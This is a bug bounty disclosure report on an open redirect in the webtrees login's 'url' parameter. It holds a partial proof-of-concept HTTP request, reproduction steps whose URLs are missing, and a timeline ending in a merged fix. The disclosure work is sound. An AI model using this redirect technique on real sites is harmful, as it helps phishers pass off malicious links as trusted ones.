Open Redirect in fisharebest/webtrees


Reported on

Sep 28th 2021


OpenRedirect at login with parameter &url=

Proof of Concept

// PoC.request
POST /demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo HTTP/2
Cookie: __Secure-WT-ID=ekks8678620p55do7do21jd4p1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers


Step to Reproduct

Access login with url:

After login success it will redirect to


This functionality is not restricted to relative URLs within the application and could be leveraged by an attacker to fool an end user into believing that a malicious URL they were redirected to is valid.

We have contacted a member of the fisharebest/webtrees team and are waiting to hear back a month ago
Greg Roach validated this vulnerability a month ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach confirmed that a fix has been merged on 551ad4 a month ago
Greg Roach has been awarded the fix bounty